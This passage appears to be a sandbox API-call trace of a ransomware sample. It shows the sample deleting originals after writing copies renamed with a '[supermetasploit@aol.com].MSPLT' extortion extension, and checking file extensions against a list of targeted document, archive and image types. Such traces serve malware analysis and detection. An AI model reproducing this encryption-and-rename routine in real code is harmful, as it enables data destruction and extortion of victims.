hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0173.336] SetEndOfFile (hFile=0x348) returned 1 [0173.338] CloseHandle (hObject=0x348) returned 1 [0173.338] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\watermark.bmp.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0173.339] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\watermark.bmp" (normalized: "c:\\588bce7c90097ed212\\watermark.bmp")) returned 1 [0173.339] lstrlenW (lpString="C:\\588bce7c90097ed212\\watermark.bmp") returned 35 [0173.339] lstrlenW (lpString="C:\\588bce7c90097ed212\\watermark.bmp") returned 35 [0173.339] lstrlenW (lpString=".doc") returned 4 [0173.339] lstrcmpiW (lpString1=".doc", lpString2=".bmp") returned 1 [0173.339] lstrlenW (lpString=".docx") returned 5 [0173.339] lstrcmpiW (lpString1=".docx", lpString2="k.bmp") returned -1 [0173.339] lstrlenW (lpString=".pdf") returned 4 [0173.339] lstrcmpiW (lpString1=".pdf", lpString2=".bmp") returned 1 [0173.339] lstrlenW (lpString=".xls") returned 4 [0173.340] lstrcmpiW (lpString1=".xls", lpString2=".bmp") returned 1 [0173.340] lstrlenW (lpString=".xlsx") returned 5 [0173.340] lstrcmpiW (lpString1=".xlsx", lpString2="k.bmp") returned -1 [0173.340] lstrlenW (lpString=".ppt") returned 4 [0173.340] lstrcmpiW (lpString1=".ppt", lpString2=".bmp") returned 1 [0173.340] lstrlenW (lpString="C:\\588bce7c90097ed212\\watermark.bmp") returned 35 [0173.340] lstrlenW (lpString=".zip") returned 4 [0173.340] lstrcmpiW (lpString1=".zip", lpString2=".bmp") returned 1 [0173.340] lstrlenW (lpString=".rar") returned 4 [0173.340] lstrcmpiW (lpString1=".rar", lpString2=".bmp") returned 1 [0173.340] lstrlenW (lpString=".bz2") returned 4 [0173.340] lstrcmpiW (lpString1=".bz2", lpString2=".bmp") returned 1 [0173.340] lstrlenW (lpString=".7z") returned 3 [0173.340] lstrcmpiW (lpString1=".7z", lpString2="bmp") returned -1 [0173.340] lstrlenW (lpString="C:\\588bce7c90097ed212\\watermark.bmp") returned 35 [0173.340] lstrlenW (lpString=".dbf") returned 4 [0173.340] lstrcmpiW (lpString1=".dbf", lpString2=".bmp") returned 1 [0173.340] lstrlenW (lpString="C:\\588bce7c90097ed212\\watermark.bmp") returned 35 [0173.340] lstrlenW (lpString=".1cd") returned 4 [0173.340] lstrcmpiW (lpString1=".1cd", lpString2=".bmp") returned -1 [0173.340] lstrlenW (lpString="C:\\588bce7c90097ed212\\watermark.bmp") returned 35 [0173.340] lstrlenW (lpString=".jpg") returned 4 [0173.340] lstrcmpiW (lpString1=".jpg", lpString2=".bmp") returned 1 [0173.340] lstrlenW (lpString="C:\\588bce7c90097ed212\\watermark.bmp") returned 35 [0173.340] lstrlenW (lpString="C:\\588bce7c90097ed212\\watermark.bmp") returned 35 [0173.341] lstrlenW (lpString=".doc") returned 4 [0173.341] lstrcmpiW (lpString1=".doc", lpString2=".bmp") returned 1 [0173.341] lstrlenW (lpString=".docx") returned 5 [0173.341] lstrcmpiW (lpString1=".docx", lpString2="k.bmp") returned -1 [0173.341] lstrlenW (lpString=".pdf") returned 4 [0173.341] lstrcmpiW (lpString1=".pdf", lpString2=".bmp") returned 1 [0173.341] lstrlenW (lpString=".xls") returned 4 [0173.341] lstrcmpiW (lpString1=".xls", lpString2=".bmp") returned 1 [0173.341] lstrlenW (lpString=".xlsx") returned 5 [0173.341] lstrcmpiW (lpString1=".xlsx", lpString2="k.bmp") returned -1 [0173.341] lstrlenW (lpString=".ppt") returned 4 [0173.341] lstrcmpiW (lpString1=".ppt", lpString2=".bmp") returned 1 [0173.341] lstrlenW (lpString="C:\\588bce7c90097ed212\\watermark.bmp") returned 35 [0173.341] lstrlenW (lpString=".zip") returned 4 [0173.341] lstrcmpiW (lpString1=".zip", lpString2=".bmp") returned 1 [0173.341] lstrlenW (lpString=".rar") returned 4 [0173.341] lstrcmpiW (lpString1=".rar", lpString2=".bmp") returned 1 [0173.341] lstrlenW (lpString=".bz2") returned 4 [0173.341] lstrcmpiW (lpString1=".bz2", lpString2=".bmp") returned 1 [0173.341] lstrlenW (lpString=".7z") returned 3 [0173.341] lstrcmpiW (lpString1=".7z", lpString2="bmp") returned -1 [0173.341] lstrlenW (lpString="C:\\588bce7c90097ed212\\watermark.bmp") returned 35 [0173.341] lstrlenW (lpString=".dbf") returned 4 [0173.341] lstrcmpiW (lpString1=".dbf", lpString2=".bmp") returned 1 [0173.341] lstrlenW (lpString="C:\\588bce7c90097ed212\\watermark.bmp") returned 35 [0173.341] lstrlenW (lpString=".1cd") returned 4 [0173.341] lstrcmpiW (lpString1=".1cd", lpString2=".bmp") returned -1 [0173.341] lstrlenW (lpString="C:\\588bce7c90097ed212\\watermark.bmp") returned 35 [0173.342] lstrlenW (lpString=".jpg") returned 4 [0173.342] lstrcmpiW (lpString1=".jpg", lpString2=".bmp") returned 1 [0173.342] lstrcmpiW (lpString1=".avi", lpString2=".MSPLT") returned -1 [0173.342] lstrlenW (lpString="boxed-correct.avi") returned 17 [0173.342] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0173.348] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x25eff14 | out: lpFileSize=0x25eff14*=111320) returned 1 [0173.348] CloseHandle (hObject=0x348) returned 1 [0173.348] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi")) returned 0x20 [0173.348] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0173.348] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.348] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0173.348] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0173.348] lstrlenW (lpString=".doc") returned 4 [0173.349] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0173.349] lstrlenW (lpString=".docx") returned 5 [0173.349] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0173.349] lstrlenW (lpString=".pdf") returned 4 [0173.349] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0173.349] lstrlenW (lpString=".xls") returned 4 [0173.349] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0173.349] lstrlenW (lpString=".xlsx") returned 5 [0173.349] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0173.349] lstrlenW (lpString=".ppt") returned 4 [0173.349] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0173.349] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0173.349] lstrlenW (lpString=".zip") returned 4 [0173.349] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0173.349] lstrlenW (lpString=".rar") returned 4 [0173.349] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0173.349] lstrlenW (lpString=".bz2") returned 4 [0173.349] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0173.349] lstrlenW (lpString=".7z") returned 3 [0173.349] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0173.349] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0173.349] lstrlenW (lpString=".dbf") returned 4 [0173.349] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0173.349] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0173.349] lstrlenW (lpString=".1cd") returned 4 [0173.349] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0173.349] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0173.349] lstrlenW (lpString=".jpg") returned 4 [0173.349] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0173.350] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0173.350] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0173.350] lstrlenW (lpString=".doc") returned 4 [0173.350] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0173.350] lstrlenW (lpString=".docx") returned 5 [0173.350] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0173.350] lstrlenW (lpString=".pdf") returned 4 [0173.350] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0173.350] lstrlenW (lpString=".xls") returned 4 [0173.350] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0173.350] lstrlenW (lpString=".xlsx") returned 5 [0173.350] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0173.350] lstrlenW (lpString=".ppt") returned 4 [0173.350] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0173.350] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0173.350] lstrlenW (lpString=".zip") returned 4 [0173.350] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0173.350] lstrlenW (lpString=".rar") returned 4 [0173.350] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0173.350] lstrlenW (lpString=".bz2") returned 4 [0173.350] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0173.350] lstrlenW (lpString=".7z") returned 3 [0173.350] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0173.350] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0173.350] lstrlenW (lpString=".dbf") returned 4 [0173.350] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0173.350] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0173.351] lstrlenW (lpString=".1cd") returned 4 [0173.351] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0173.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0173.351] lstrlenW (lpString=".jpg") returned 4 [0173.351] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0173.351] lstrcmpiW (lpString1=".avi", lpString2=".MSPLT") returned -1 [0173.351] lstrlenW (lpString="boxed-delete.avi") returned 16 [0173.351] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0173.352] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x25eff14 | out: lpFileSize=0x25eff14*=48936) returned 1 [0173.352] CloseHandle (hObject=0x348) returned 1 [0173.352] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi")) returned 0x20 [0173.352] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0173.352] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.352] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0173.353] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0173.353] lstrlenW (lpString=".doc") returned 4 [0173.353] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0173.353] lstrlenW (lpString=".docx") returned 5 [0173.353] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0173.353] lstrlenW (lpString=".pdf") returned 4 [0173.353] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0173.353] lstrlenW (lpString=".xls") returned 4 [0173.353] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0173.353] lstrlenW (lpString=".xlsx") returned 5 [0173.353] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0173.353] lstrlenW (lpString=".ppt") returned 4 [0173.353] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0173.353] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0173.353] lstrlenW (lpString=".zip") returned 4 [0173.353] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0173.353] lstrlenW (lpString=".rar") returned 4 [0173.353] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0173.353] lstrlenW (lpString=".bz2") returned 4 [0173.353] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0173.353] lstrlenW (lpString=".7z") returned 3 [0173.353] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0173.353] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0173.353] lstrlenW (lpString=".dbf") returned 4 [0173.353] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0173.353] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0173.353] lstrlenW (lpString=".1cd") returned 4 [0173.353] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0173.354] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0173.354] lstrlenW (lpString=".jpg") returned 4 [0173.354] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0173.354] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0173.354] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0173.354] lstrlenW (lpString=".doc") returned 4 [0173.354] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0173.354] lstrlenW (lpString=".docx") returned 5 [0173.354] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0173.354] lstrlenW (lpString=".pdf") returned 4 [0173.354] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0173.354] lstrlenW (lpString=".xls") returned 4 [0173.354] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0173.354] lstrlenW (lpString=".xlsx") returned 5 [0173.354] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0173.354] lstrlenW (lpString=".ppt") returned 4 [0173.354] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0173.354] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0173.354] lstrlenW (lpString=".zip") returned 4 [0173.354] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0173.354] lstrlenW (lpString=".rar") returned 4 [0173.354] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0173.354] lstrlenW (lpString=".bz2") returned 4 [0173.354] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0173.354] lstrlenW (lpString=".7z") returned 3 [0173.354] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0173.354] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0173.355] lstrlenW (lpString=".dbf") returned 4 [0173.355] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0173.355] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0173.355] lstrlenW (lpString=".1cd") returned 4 [0173.355] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0173.355] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0173.355] lstrlenW (lpString=".jpg") returned 4 [0173.355] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0173.355] lstrcmpiW (lpString1=".avi", lpString2=".MSPLT") returned -1 [0173.355] lstrlenW (lpString="boxed-join.avi") returned 14 [0173.355] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0173.359] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x25eff14 | out: lpFileSize=0x25eff14*=46622) returned 1 [0173.359] CloseHandle (hObject=0x348) returned 1 [0173.360] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi")) returned 0x20 [0173.360] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0173.360] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.360] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0173.360] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0173.360] lstrlenW (lpString=".doc") returned 4 [0173.360] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0173.361] lstrlenW (lpString=".docx") returned 5 [0173.361] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0173.361] lstrlenW (lpString=".pdf") returned 4 [0173.361] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0173.361] lstrlenW (lpString=".xls") returned 4 [0173.361] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0173.361] lstrlenW (lpString=".xlsx") returned 5 [0173.361] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0173.361] lstrlenW (lpString=".ppt") returned 4 [0173.361] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0173.361] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0173.361] lstrlenW (lpString=".zip") returned 4 [0173.361] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0173.361] lstrlenW (lpString=".rar") returned 4 [0173.361] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0173.361] lstrlenW (lpString=".bz2") returned 4 [0173.361] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0173.361] lstrlenW (lpString=".7z") returned 3 [0173.361] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0173.361] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0173.361] lstrlenW (lpString=".dbf") returned 4 [0173.361] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0173.361] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0173.361] lstrlenW (lpString=".1cd") returned 4 [0173.361] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0173.361] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0173.361] lstrlenW (lpString=".jpg") returned 4 [0173.361] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0173.362] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0173.362] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0173.362] lstrlenW (lpString=".doc") returned 4 [0173.362] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0173.362] lstrlenW (lpString=".docx") returned 5 [0173.362] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0173.362] lstrlenW (lpString=".pdf") returned 4 [0173.362] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0173.362] lstrlenW (lpString=".xls") returned 4 [0173.362] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0173.362] lstrlenW (lpString=".xlsx") returned 5 [0173.362] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0173.362] lstrlenW (lpString=".ppt") returned 4 [0173.362] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0173.362] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0173.362] lstrlenW (lpString=".zip") returned 4 [0173.362] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0173.362] lstrlenW (lpString=".rar") returned 4 [0173.362] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0173.362] lstrlenW (lpString=".bz2") returned 4 [0173.362] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0173.362] lstrlenW (lpString=".7z") returned 3 [0173.362] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0173.362] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0173.362] lstrlenW (lpString=".dbf") returned 4 [0173.362] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0173.362] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0173.362] lstrlenW (lpString=".1cd") returned 4 [0173.362] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0173.363] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0173.363] lstrlenW (lpString=".jpg") returned 4 [0173.363] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0173.363] lstrcmpiW (lpString1=".avi", lpString2=".MSPLT") returned -1 [0173.363] lstrlenW (lpString="correct.avi") returned 11 [0173.363] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0173.363] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x25eff14 | out: lpFileSize=0x25eff14*=180172) returned 1 [0173.363] CloseHandle (hObject=0x348) returned 1 [0173.363] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi")) returned 0x20 [0173.364] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0173.364] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.364] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0173.364] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0173.364] lstrlenW (lpString=".doc") returned 4 [0173.364] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0173.364] lstrlenW (lpString=".docx") returned 5 [0173.364] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0173.364] lstrlenW (lpString=".pdf") returned 4 [0173.364] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0173.364] lstrlenW (lpString=".xls") returned 4 [0173.364] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0173.364] lstrlenW (lpString=".xlsx") returned 5 [0173.364] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0173.364] lstrlenW (lpString=".ppt") returned 4 [0173.364] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0173.364] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0173.364] lstrlenW (lpString=".zip") returned 4 [0173.364] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0173.364] lstrlenW (lpString=".rar") returned 4 [0173.364] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0173.364] lstrlenW (lpString=".bz2") returned 4 [0173.364] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0173.364] lstrlenW (lpString=".7z") returned 3 [0173.365] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0173.365] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0173.365] lstrlenW (lpString=".dbf") returned 4 [0173.365] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0173.365] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0173.365] lstrlenW (lpString=".1cd") returned 4 [0173.365] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0173.365] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0173.365] lstrlenW (lpString=".jpg") returned 4 [0173.365] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0173.365] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0173.365] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0173.365] lstrlenW (lpString=".doc") returned 4 [0173.365] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0173.365] lstrlenW (lpString=".docx") returned 5 [0173.365] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0173.365] lstrlenW (lpString=".pdf") returned 4 [0173.365] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0173.365] lstrlenW (lpString=".xls") returned 4 [0173.365] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0173.365] lstrlenW (lpString=".xlsx") returned 5 